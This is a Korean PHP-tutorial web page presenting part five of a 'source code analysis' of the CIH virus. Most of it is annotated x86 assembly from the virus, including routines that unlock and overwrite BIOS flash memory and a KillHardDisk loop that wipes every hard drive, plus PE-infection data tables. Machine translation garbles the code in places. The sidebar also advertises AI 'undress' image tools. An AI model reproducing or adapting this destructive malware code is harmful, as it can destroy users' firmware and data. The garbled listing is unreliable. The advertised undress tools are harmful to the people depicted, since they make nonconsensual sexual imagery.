바이러스 프로그램 소스코드 예제 분석 - CIH 바이러스[5]-PHP 튜토리얼-php.cn

집

백엔드 개발

PHP 튜토리얼

바이러스 프로그램 소스코드 예제 분석 - CIH 바이러스[5]

黄舟

Jan 17, 2017 am 11:21 AM

바이러스 프로그램 소스코드 예시 분석-CIH 바이러스[5]

push ecx
loop $

; BIOS에서 추가 000E0000 - 000E007F 세그먼트 ROM 데이터를 삭제합니다. 총 80시간 바이트입니다.
xor ah, ah
mov [eax], al
　
　xchg ecx, eax
　loop $
　
　; BIOS의 000E0000 - 000FFFFF 세그먼트 데이터를 표시하고 활성화합니다. 총 128KB입니다. 이 세그먼트는 mov eax, 0f5555h 정보를 쓸 수 있습니다.
Pop ecx
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h

loop $

000FE000 - 000FE07F 세그먼트 데이터 삭제; BIOS의 총 80h 바이트
mov ah, 0e0h
mov [eax], al

; BIOS의 000F0000 - 000FFFFF 섹션 숨기기, 총 64KB
mov word ptr ( BooleanCalculateCode-@10) [esi], 100ch
esi 호출

모든 하드 드라이브 삭제
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2ch
push 0c0001000h
mov bh, 08h
push ebx
push ecx
push ecx
push ecx
push 40000501h
inc ecx
push ecx
push ecx

mov esi, esp
sub esp, 0ach

루프를 파괴
LoopOfKillHardDisk:
int 20h
dd 00100004h
　
cmp word ptr [esi+06h], 0017h
je KillNextDataSection

;ChangeNextHardDisk:
inc byte ptr [esi+4dh]

jmp LoopOfKillHardDisk
　
　;다음 영역 파괴
　KillNextDataSection:
　add dword ptr [esi+10h], ebx
　mov byte ptr [esi+4dh], FirstKillHardDiskNumber
　
jmp LoopOfKillHardDisk

EEPROM을 활성화하여 정보 쓰기
EnableEEPROMToWrite:
mov [eax], cl
mov [ecx], al
mov byte ptr [eax], 80h
mov [eax ], cl
mov [ecx], al

ret

IOForEEPROM:
@10 = IOForEEPROM

xchg eax, edi
xchg edx, ebp
출력 dx, eax

xchg eax, edi
al , 44h
　
xchg eax, edi
xchg edx, ebp
출력 dx, eax

xchg eax, edi
, al
　
　ret
　
　;정적 데이터 정의
　LastVxdCallAddress = IFSMgr_Ring0_FileIO;마지막 호출된 Vxd 명령어 주소
　VxdCallAddressTable DB 00h
　db IFSMgr_RemoveFileSystem ApiHook-_PageAllocate
　db UniToBCSPath- IFSMgr_RemoveFileSystemApiHook
db IFSMgr_Ring0_FileIO-UniToBCSPath ;각 Vxd 호출 명령어의 주소 차이
xd의 호출 번호
VxdCallTable 크기 = ($-VxdCallIDTable)/04h ; 프로그램
　
;바이러스 버전 및 저작권 정보 정의
VirusVersionCopyright db 'CIH v';CIH 바이러스 식별
db MajorVirusVersion+'0';기본 버전 번호
에 사용된 Vxd 호출 횟수 db '.'
db MinorVirusVersion+'0' ; 마이너 버전 번호
db ' TATUNG' ; 바이러스 크기
VirusSize = $ + SizeOfVirusCodeSectionTableEndMark(04h) + NumberOfSections *SizeOfVirusCodeSectionTable(08h)
+ SizeOfTheFirstVirusCodeSectionTable(04h)

; 동적 데이터 정의
VirusGameDataStartAddress = VirusSize
@6 = VirusGameDataStartAddress ; 바이러스 데이터 시작 주소

OnBusy db 0; "사용 중" 플래그
FileModificationTime dd ? DataBuffer
NumberOfSections dw ? 파일 시간
SymbolsPointer dd ? dd ? SizeOfOptionalHeader dw ? ;선택적 헤더의 길이
_Characteristics dw ? ;문자 집합 플래그
매직 dw ;플래그 단어(항상 010bh)
링커 버전 번호
SizeOfCode ?
SizeOfInitializedData dd ? 초기화되지 않은 데이터 블록 크기
BaseOfCode dd ;
　BaseOfData dd ? 데이터 섹션 시작 RVA
　ImageBase dd ? 기본 주소 로드 RVA
　
　@9 = $
　SectionAlignment dd ;FileAlignment dd ? alignment
　OperatingSystemVersion dd ? 필수 운영 체제 버전 번호
　ImageVersion dd ? 사용자 정의 버전 번호
　SubsystemVersion dd ? 필수 하위 시스템 버전 번호
　Reserved dd ? ; 파일의 각 부분의 총 길이
SizeOfHeaders dd ? 파일 헤더 크기
SizeOfImageHeaderToRead = $-NumberOfSections
NewAddressOfEntryPoint = DataBuffer
SizeOfImageHeaderToWrite = 04h
　
StartOfSectionTable=@9 > PointerToRawData = StartOfSectionTable+14h; 블록 물리적 오프셋
PointerToRelocations = StartOfSectionTable+18h; 재배치 오프셋
PointerToLineNumbers = StartOfSectionTable+1ch; 줄 번호 테이블 오프셋
NumberOfRelocations = StartOfSectionTable+20h; NumberOfLinenNmbers = StartOfSectionTable+22h ; 행 번호 테이블 수
Characteristics = StartOfSectionTable+24h ; 블록 속성
SizeOfScetionTable = Characteristics+04h-SectionName ; 메모리 양 바이러스에 필요함
VirusNeedBaseMemory = $
VirusNeedBaseMemory = $

VirusTotalNeedMemory = @9
; + SizeOfVirusCodeSectionTableEndMark(04h)
+ NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; END FileHeader
위의 코드 분석 과정을 통해 CIH 바이러스는 명확한 구조와 뚜렷한 계층을 가지고 있음을 알 수 있습니다. 이 바이러스 프로그램의 백본 구조는 바이러스의 세부 사항이 win95 방식에 따라 처리되고 모든 시스템 호출이 Vxd를 사용하여 이루어진다는 점을 제외하면 DOS 바이러스의 백본 구조와 매우 유사합니다. 이는 Windows에서 API 기능을 사용하는 것과 비교하여 바이러스 프로그램을 더 낮은 수준으로, 더 효율적으로 만들고, 인터럽트를 사용하는 것에 비해 바이러스 자체의 복잡한 재배치 프로세스를 고려할 필요가 없으며 더 잘 예방할 수 있습니다. 프로그램 추적.

CIH 바이러스에는 두 가지 혁신이 있습니다. 하나는 바이러스가 감염되면 감염된 파일의 블록 사이의 빈 공간을 찾아 그 안에 바이러스 고유의 다양한 데이터 구조와 코드를 쓰는 것입니다. 충분하지 않으며 전염성이 없으므로 일부 파일이 감염되지 않는 이유 중 하나입니다.) 둘째, 바이러스는 공격할 때 플래시 메모리를 태울 뿐만 아니라 하드 디스크를 파괴하여 컴퓨터 하드웨어를 손상시킬 수 있습니다.

보안상의 이유로 바이러스 공격을 유발하고 하드웨어를 손상시키는 코드 부분에 대한 자세한 분석을 제공하지 않았습니다.

위 내용은 바이러스 프로그램 소스코드 예제 분석-CIH 바이러스[5]의 내용이며, 더 많은 관련 내용은 PHP 중국어 홈페이지(www. php.cn)!

성명

본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

관련 기사

PHP vs. Python : 차이점 이해Apr 11, 2025 am 12:15 AM

PHP와 Python은 각각 고유 한 장점이 있으며 선택은 프로젝트 요구 사항을 기반으로해야합니다. 1.PHP는 간단한 구문과 높은 실행 효율로 웹 개발에 적합합니다. 2. Python은 간결한 구문 및 풍부한 라이브러리를 갖춘 데이터 과학 및 기계 학습에 적합합니다.

PHP : 죽어 가거나 단순히 적응하고 있습니까?Apr 11, 2025 am 12:13 AM

PHP는 죽지 않고 끊임없이 적응하고 진화합니다. 1) PHP는 1994 년부터 새로운 기술 트렌드에 적응하기 위해 여러 버전 반복을 겪었습니다. 2) 현재 전자 상거래, 컨텐츠 관리 시스템 및 기타 분야에서 널리 사용됩니다. 3) PHP8은 성능과 현대화를 개선하기 위해 JIT 컴파일러 및 기타 기능을 소개합니다. 4) Opcache를 사용하고 PSR-12 표준을 따라 성능 및 코드 품질을 최적화하십시오.

PHP의 미래 : 적응 및 혁신Apr 11, 2025 am 12:01 AM

PHP의 미래는 새로운 기술 트렌드에 적응하고 혁신적인 기능을 도입함으로써 달성 될 것입니다. 1) 클라우드 컴퓨팅, 컨테이너화 및 마이크로 서비스 아키텍처에 적응, Docker 및 Kubernetes 지원; 2) 성능 및 데이터 처리 효율을 향상시키기 위해 JIT 컴파일러 및 열거 유형을 도입합니다. 3) 지속적으로 성능을 최적화하고 모범 사례를 홍보합니다.

PHP의 초록 클래스 또는 인터페이스에 대한 특성과 언제 특성을 사용 하시겠습니까?Apr 10, 2025 am 09:39 AM

PHP에서, 특성은 방법 재사용이 필요하지만 상속에 적합하지 않은 상황에 적합합니다. 1) 특성은 클래스에서 다중 상속의 복잡성을 피할 수 있도록 수많은 방법을 허용합니다. 2) 특성을 사용할 때는 대안과 키워드를 통해 해결할 수있는 방법 충돌에주의를 기울여야합니다. 3) 성능을 최적화하고 코드 유지 보수성을 향상시키기 위해 특성을 과도하게 사용해야하며 단일 책임을 유지해야합니다.

DIC (Dependency Injection Container) 란 무엇이며 PHP에서 사용하는 이유는 무엇입니까?Apr 10, 2025 am 09:38 AM

의존성 주입 컨테이너 (DIC)는 PHP 프로젝트에 사용하기위한 객체 종속성을 관리하고 제공하는 도구입니다. DIC의 주요 이점에는 다음이 포함됩니다. 1. 디커플링, 구성 요소 독립적 인 코드는 유지 관리 및 테스트가 쉽습니다. 2. 유연성, 의존성을 교체 또는 수정하기 쉽습니다. 3. 테스트 가능성, 단위 테스트를 위해 모의 객체를 주입하기에 편리합니다.

SPL SplfixedArray 및 일반 PHP 어레이에 비해 성능 특성을 설명하십시오.Apr 10, 2025 am 09:37 AM

SplfixedArray는 PHP의 고정 크기 배열로, 고성능 및 메모리 사용이 필요한 시나리오에 적합합니다. 1) 동적 조정으로 인한 오버 헤드를 피하기 위해 생성 할 때 크기를 지정해야합니다. 2) C 언어 배열을 기반으로 메모리 및 빠른 액세스 속도를 직접 작동합니다. 3) 대규모 데이터 처리 및 메모리에 민감한 환경에 적합하지만 크기가 고정되어 있으므로주의해서 사용해야합니다.

PHP는 파일 업로드를 어떻게 단단히 처리합니까?Apr 10, 2025 am 09:37 AM

PHP는 $ \ _ 파일 변수를 통해 파일 업로드를 처리합니다. 보안을 보장하는 방법에는 다음이 포함됩니다. 1. 오류 확인 확인, 2. 파일 유형 및 크기 확인, 3 파일 덮어 쓰기 방지, 4. 파일을 영구 저장소 위치로 이동하십시오.

Null Coalescing 연산자 (??) 및 Null Coalescing 할당 연산자 (?? =)은 무엇입니까?Apr 10, 2025 am 09:33 AM

JavaScript에서는 NullCoalescingOperator (??) 및 NullCoalescingAssignmentOperator (?? =)를 사용할 수 있습니다. 1. 2. ??= 변수를 오른쪽 피연산자의 값에 할당하지만 변수가 무효 또는 정의되지 않은 경우에만. 이 연산자는 코드 로직을 단순화하고 가독성과 성능을 향상시킵니다.

See all articles

핫 AI 도구

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

AI 옷 제거제

AI Hentai Generator

AI Hentai를 무료로 생성하십시오.

뜨거운 도구

MinGW - Windows용 미니멀리스트 GNU

이 프로젝트는 osdn.net/projects/mingw로 마이그레이션되는 중입니다. 계속해서 그곳에서 우리를 팔로우할 수 있습니다. MinGW: GCC(GNU Compiler Collection)의 기본 Windows 포트로, 기본 Windows 애플리케이션을 구축하기 위한 무료 배포 가능 가져오기 라이브러리 및 헤더 파일로 C99 기능을 지원하는 MSVC 런타임에 대한 확장이 포함되어 있습니다. 모든 MinGW 소프트웨어는 64비트 Windows 플랫폼에서 실행될 수 있습니다.